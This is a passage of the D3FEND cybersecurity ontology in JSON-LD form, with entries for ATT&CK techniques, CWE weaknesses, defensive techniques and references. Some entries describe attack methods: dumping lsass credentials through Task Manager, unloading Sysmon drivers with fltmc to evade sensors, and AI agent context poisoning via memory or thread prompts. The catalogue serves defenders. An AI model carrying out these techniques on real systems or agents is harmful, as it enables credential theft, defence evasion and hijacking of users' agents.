      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001169"
    },
    {
      "@id": "d3f:T1182",
      "@type": "owl:Class",
      "d3f:attack-id": "T1182",
      "d3f:definition": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.009",
      "rdfs:label": "AppCert DLLs",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:SetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:modifies": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Set Thread Context",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N240af7a608fb415ca0a946ac13f986cc"
        }
      ]
    },
    {
      "@id": "_:N240af7a608fb415ca0a946ac13f986cc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:T1135",
      "@type": "owl:Class",
      "d3f:attack-id": "T1135",
      "d3f:definition": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.",
      "rdfs:label": "Network Share Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CWE-798",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-798",
      "d3f:definition": "The product contains hard-coded credentials, such as a password or cryptographic key.",
      "d3f:weakness-of": {
        "@id": "d3f:AuthenticationFunction"
      },
      "rdfs:label": "Use of Hard-coded Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1391"
        },
        {
          "@id": "d3f:CWE-344"
        },
        {
          "@id": "d3f:CWE-671"
        },
        {
          "@id": "_:N62b35cb4cdc54a52a4cdb935ef603d4e"
        }
      ]
    },
    {
      "@id": "_:N62b35cb4cdc54a52a4cdb935ef603d4e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationFunction"
      }
    },
    {
      "@id": "d3f:FileFooterBlockContent",
      "@type": "owl:Class",
      "d3f:definition": "The content of a footer block not including the signature.",
      "rdfs:label": "File Footer Block Content",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:CWE-793",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-793",
      "d3f:definition": "The product receives data from an upstream component, but only filters a single instance of a special element before sending it to a downstream component.",
      "rdfs:label": "Only Filtering One Instance of a Special Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-792"
      }
    },
    {
      "@id": "d3f:Expectation-maximizationClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EMC",
      "d3f:definition": "An unsupervised clustering algorithm and extends to NLP applications like Latent Dirichlet Allocation, the Baum-Welch algorithm for Hidden Markov Models, and medical imaging.",
      "d3f:kb-article": "## References\nTowards Data Science. (n.d.). Expectation Maximization Explained. [Link](https://towardsdatascience.com/expectation-maximization-explained-c82f5ed438e5#:~:text=Expectation%20Maximization%20(EM)%20is%20a,Markov%20Models%2C%20and%20medical%20imaging.)",
      "rdfs:label": "Expectation-maximization Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Distribution-basedClustering"
      }
    },
    {
      "@id": "d3f:AML.T0080",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0080",
      "d3f:definition": "Adversaries may attempt to manipulate the context used by an AI agent's large language model (LLM) to influence the responses it generates or actions it takes. This allows an adversary to persistently change the behavior of the target agent and further their goals.\n\nContext poisoning can be accomplished by prompting the an LLM to add instructions or preferences to memory (See [Memory](/techniques/AML.T0080.000)) or by simply prompting an LLM that uses prior messages in a thread as part of its context (See [Thread](/techniques/AML.T0080.001)).",
      "rdfs:label": "AI Agent Context Poisoning - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0080"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASPersistenceTechnique"
      },
      "skos:prefLabel": "AI Agent Context Poisoning"
    },
    {
      "@id": "d3f:BayesianEstimation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BE",
      "d3f:definition": "A Bayes estimator or a Bayes action is an estimator or decision rule that minimizes the posterior expected value of a loss function (i.e., the posterior expected loss).",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Bayes estimator. [Link](https://en.wikipedia.org/wiki/Bayes_estimator)",
      "rdfs:label": "Bayesian Estimation",
      "rdfs:subClassOf": {
        "@id": "d3f:BayesianMethod"
      }
    },
    {
      "@id": "d3f:T1204.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:URL"
      },
      "d3f:attack-id": "T1204.001",
      "d3f:definition": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetWebTraffic"
      },
      "rdfs:label": "Malicious Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1204"
        },
        {
          "@id": "_:Nefc660cc3e674515a86381078e8d3456"
        },
        {
          "@id": "_:N3fbeb59236e84a69b4c2a3edfe67f218"
        }
      ]
    },
    {
      "@id": "_:Nefc660cc3e674515a86381078e8d3456",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "_:N3fbeb59236e84a69b4c2a3edfe67f218",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:T1215",
      "@type": "owl:Class",
      "d3f:attack-id": "T1215",
      "d3f:definition": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.006",
      "rdfs:label": "Kernel Modules and Extensions",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-42",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-42",
      "d3f:definition": "The product accepts path input in the form of trailing dot ('filedir.') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filename.' (Trailing Dot)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-162"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002546_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:IOPortRestriction"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization physically disables or removes organization-defined connection ports or input/output devices on organization-defined information systems or information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002546"
    },
    {
      "@id": "d3f:PlatformHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PlatformHardening"
      ],
      "d3f:d3fend-id": "D3-PH",
      "d3f:definition": "Hardening components of a Platform with the intention of making them more difficult to exploit.\n\nPlatforms includes components such as:\n* BIOS UEFI Subsystems\n* Hardware security devices such as Trusted Platform Modules\n* Boot process logic or code\n* Kernel software components",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "d3f:synonym": [
        "Endpoint Hardening",
        "System Hardening"
      ],
      "rdfs:label": "Platform Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N698fbc6005ea428eba1669429cf68a45"
        }
      ]
    },
    {
      "@id": "_:N698fbc6005ea428eba1669429cf68a45",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "d3f:URL",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": {
        "@id": "d3f:Resource"
      },
      "d3f:definition": "A Uniform Resource Locator (URL), commonly informally termed a web address (a term which is not defined identically) is a reference to a web resource that specifies its location on a computer network and a mechanism for retrieving it.A URL is a specific type of Uniform Resource Identifier (URI), although many people use the two terms interchangeably. A URL implies the means to access an indicated resource, which is not true of every URI. URLs occur most commonly to reference web pages (http), but are also used for file transfer (ftp), email (mailto), database access (JDBC), and many other applications.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Uniform_Resource_Locator"
      },
      "rdfs:label": "URL",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/url"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:Nf77702bb33ee4874a09e5816f710fb30"
        }
      ],
      "skos:altLabel": "Uniform Resource Locator"
    },
    {
      "@id": "_:Nf77702bb33ee4874a09e5816f710fb30",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:Reference-GuideToStorageEncryptionTechnologiesForEndUserDevices",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-111.pdf"
      },
      "d3f:kb-abstract": "Many threats against end user devices could cause information stored on the devices to be accessed by unauthorized parties. To prevent such disclosures of information, particularly of personally identifiable information (PII) and other sensitive data, the information needs to be secured. Securing other components of end user devices, such as operating systems, is also necessary, but in many cases storage security, which is the process of allowing only authorized parties to access and use stored information. The primary security controls for restricting access to sensitive information stored on end user devices are encryption and authentication. Encryption can be applied granularly, such as to an individual file containing sensitive information, or broadly, such as encrypting all stored data. The appropriate encryption solution for a particular situation depends primarily upon the type of storage, the amount of information that needs to be protected, the environments where the storage will be located, and the threats that need to be mitigated.",
      "d3f:kb-author": "Karen Scarfone, Murugiah Souppaya, and Matt Sexton",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-111 - Guide to Storage Encryption Technologies for End User Devices",
      "rdfs:label": "Reference - Guide to Storage Encryption Technologies for End User Devices"
    },
    {
      "@id": "d3f:NetworkConnectionFailEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network connection attempt fails.",
      "rdfs:label": "Network Connection Fail Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkConnectionEvent"
      }
    },
    {
      "@id": "d3f:PhysicalLocation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The terms location  [here, a physical location] and place in geography are used to identify a point or an area on the Earth's surface or elsewhere. The term location generally implies a higher degree of certainty than place, which often indicates an entity with an ambiguous boundary, relying more on human or social attributes of place identity and sense of place than on geometry. The distinction between space and place is considered a central concern of geography, and has been addressed by scholars such as Yi-Fu Tuan and John Agnew.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Location_(geography)"
      },
      "rdfs:label": "Physical Location",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/location"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:OTEvent",
      "@type": "owl:Class",
      "d3f:definition": "A discrete occurrence within an operational technology environment that denotes a significant change in state, execution of a command, or transmission of information.",
      "rdfs:label": "OT Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nff3d8922641041578b1b8f004d369fdc"
        }
      ]
    },
    {
      "@id": "_:Nff3d8922641041578b1b8f004d369fdc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:OTConnectionCommand",
      "@type": "owl:Class",
      "d3f:definition": "Establish a network connection with a device.",
      "rdfs:comment": [
        "BACnet: vtOpen\nBACnet: vtClose ",
        "ENIP: Register Session\nENIP: Unregister Session"
      ],
      "rdfs:label": "OT Connection Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTNetworkManagementCommand"
      }
    },
    {
      "@id": "d3f:VersionControlTool",
      "@type": "owl:Class",
      "d3f:definition": "Version control tools are tools that used to conduct version control. A  component of software configuration management, version control, also known as revision control, source control, or source code management systems are systems responsible for the management of changes to documents, computer programs, large web sites, and other collections of information. Changes are usually identified by a number or letter code, termed the \"revision number\", \"revision level\", or simply \"revision\". For example, an initial set of files is \"revision 1\". When the first change is made, the resulting set is \"revision 2\", and so on. Each revision is associated with a timestamp and the person making the change. Revisions can be compared, restored, and with some types of files, merged.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Version_control"
      },
      "rdfs:label": "Version Control Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Software_configuration_management"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      },
      "skos:altLabel": [
        "Revision Control",
        "Source Control"
      ]
    },
    {
      "@id": "d3f:OperatingSystemClock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system clock is the primary software clock maintained by the operating system, representing the system's current time. It is used for timestamping files, scheduling tasks, and synchronizing processes.",
      "d3f:implemented-by": {
        "@id": "d3f:Kernel"
      },
      "rdfs:label": "Operating System Clock",
      "rdfs:seeAlso": {
        "@id": "https://linux.die.net/sag/hw-sw-clocks.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SoftwareClock"
        },
        {
          "@id": "_:Nde0cd72fd0cb4a54b2b287c6dd1d6c66"
        }
      ]
    },
    {
      "@id": "_:Nde0cd72fd0cb4a54b2b287c6dd1d6c66",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implemented-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "d3f:Reference-CredentialDumpingViaWindowsTaskManager_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-08-001/"
      },
      "d3f:kb-abstract": "The Windows Task Manager may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching Task Manager as a privileged user, selecting lsass.exe, and clicking \"Create dump file\". This saves a dump file to disk with a deterministic name that includes the name of the process being dumped.\n\nThis requires filesystem data to determine whether files have been created.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-08-001: Credential Dumping via Windows Task Manager",
      "rdfs:label": "Reference - CAR-2019-08-001: Credential Dumping via Windows Task Manager - MITRE"
    },
    {
      "@id": "d3f:CWE-1065",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1065",
      "d3f:definition": "The product uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server.",
      "rdfs:label": "Runtime Resource Management Control Element in a Component Built to Run on Application Servers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:ApplicationDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the disabling of an application, preventing it from being operational or accessed until re-enabled.",
      "rdfs:label": "Application Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:Nea705141417841ef9df472a4486e5182"
        }
      ]
    },
    {
      "@id": "_:Nea705141417841ef9df472a4486e5182",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationEnableEvent"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Separate Processing Domains",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "rdfs:label": "AC-6(4)"
    },
    {
      "@id": "d3f:T1585.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1585.003",
      "d3f:definition": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)",
      "rdfs:label": "Cloud Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1585"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-003%3AIndicatorBlocking-DriverUnloaded_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-003/"
      },
      "d3f:kb-abstract": "Adversaries may attempt to evade system defenses by unloading minifilter drivers used by host-based sensors such as Sysmon through the use of the fltmc command-line utility. Accordingly, this analytic looks for command-line invocations of this utility when used to unload minifilter drivers.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-003: Indicator Blocking - Driver Unloaded",
      "rdfs:label": "Reference - CAR-2020-09-003: Indicator Blocking - Driver Unloaded - MITRE"
    },
    {
      "@id": "d3f:CCI-001374_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, prohibits the transfer of organization-defined unsanctioned information in accordance with the organization-defined security policy.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001374"
    },
    {
      "@id": "d3f:DigitalFingerprint",
      "@type": "owl:Class",
      "d3f:definition": "A digital signature uniquely identifies data and has the property that changing a single bit in the data will cause a completely different message digest to be generated.",
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.gov/glossary/term/digital_fingerprint"
      },
      "rdfs:label": "Digital Fingerprint",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/fingerprint"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Identifier"
      }
    },
    {
      "@id": "d3f:CCI-002711_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:TPMBootIntegrity"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs an integrity check of organization-defined firmware at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002711"
    },
    {
      "@id": "d3f:CWE-1049",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1049",
      "d3f:definition": "The product performs a data query with a large number of joins and sub-queries on a large data table.",
      "rdfs:label": "Excessive Data Query Operations in a Large Data Table",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:LoadModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call that loads a driver or extension into the kernel.",
      "d3f:loads": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "d3f:KernelModule"
        }
      ],
      "rdfs:label": "Load Module",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N3ab39c85780841e182d4075bd3f50798"
        },
        {
          "@id": "_:N0cd2fdf510604fff81c1e26e81e8f309"
        }
      ]
    },
    {
      "@id": "_:N3ab39c85780841e182d4075bd3f50798",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "_:N0cd2fdf510604fff81c1e26e81e8f309",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:DNSAllowlisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DNSAllowlisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "d3f:d3fend-id": "D3-DNSAL",
      "d3f:definition": "Permitting only approved domains and their subdomains to be resolved.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DNSWhitelist-DNSWL-EmailAuthenticationMethodExtension"
      },
      "d3f:synonym": "DNS Whitelisting",
      "rdfs:label": "DNS Allowlisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N00f8e83848f84254af2b2ee82fdf178f"
        }
      ]
    },
    {
      "@id": "_:N00f8e83848f84254af2b2ee82fdf178f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:PeripheralFirmwareVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PeripheralFirmwareVerification"
      ],
      "d3f:d3fend-id": "D3-PFV",
      "d3f:definition": "Cryptographically verifying peripheral firmware integrity.",
      "d3f:kb-article": "# How it works\nPeripherial firmware is collected and  analyzed on a host either periodically or on demand. This information may be collected for future comparisons.\n\nChanges in firmware hash values may indicate that the firmware has been tampered with or that firmware images are not maintained to current baselined versions, or even known vulnerable versions are deployed.\n\n## Considerations\n* Trust baselines will need to be generated for specific devices\n* Changes to trusted configurations will need to be managed across the enterprise",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareVerificationEclypsium"
        },
        {
          "@id": "d3f:Reference-FirmwareVerificationTrapezoid"
        }
      ],
      "d3f:verifies": {
        "@id": "d3f:PeripheralFirmware"
      },
      "rdfs:label": "Peripheral Firmware Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "_:N95a467f4debd4b2e81685e9951fa63d1"
        }
      ]
    },
    {
      "@id": "_:N95a467f4debd4b2e81685e9951fa63d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PeripheralFirmware"
      }
    },
    {
      "@id": "d3f:Reference-AuditUserAccountManagement",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-account-management"
      },
      "d3f:kb-abstract": "Audit User Account Management determines whether the operating system generates audit events when specific user account management tasks are performed.",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DomainAccountMonitoring"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        }
      ],
      "d3f:kb-reference-title": "Audit User Account Management",
      "rdfs:label": "Reference - Audit User Account Management"
    },
    {
      "@id": "d3f:Reference-USBFilterForHubMaliciousCodePreventionSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9990325B2/en"
      },
      "d3f:kb-abstract": "The present invention relates generally to computer systems, and more specifically, to a universal serial bus (USB) filter hub for a computer system.",
      "d3f:kb-author": "Steven R Hetzler, Daniel F Smith",
      "d3f:kb-organization": "International Business Machines Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:IOPortRestriction"
      },
      "d3f:kb-reference-title": "Universal serial bus (USB) filter hub malicious code prevention system",
      "rdfs:label": "Reference - USB filter for hub malicious code prevention system"
    },
    {
      "@id": "d3f:CWE-1249",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1249",
      "d3f:definition": "The product provides an application for administrators to manage parts of the underlying operating system, but the application does not accurately identify all of the relevant entities or resources that exist in the OS; that is, the application's model of the OS's state is inconsistent with the OS's actual state.",
      "d3f:synonym": "Ghost in the Shell",
      "rdfs:label": "Application-Level Admin Tool with Inconsistent View of Underlying Operating System",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1250"
      }
    },
    {
      "@id": "d3f:CWE-668",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-668",
      "d3f:definition": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.",
      "rdfs:label": "Exposure of Resource to Wrong Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:Reference-WindowsRemoteManagement_WinRM_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": ""
      },
      "d3f:kb-abstract": "",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:AdministrativeNetworkActivityAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-006: Windows Remote Management (WinRM)",
      "rdfs:label": "Reference - CAR-2014-11-006: Windows Remote Management (WinRM) - MITRE"
    },
    {
      "@id": "d3f:OSAPIAllocateMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that requests and allocates a region of memory for use by a process or application.",
      "d3f:invokes": {
        "@id": "d3f:AllocateMemory"
      },
      "rdfs:label": "OS API Allocate Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N7f121f2bc4e0400abc752409e01edca0"
        }
      ]
    },
    {
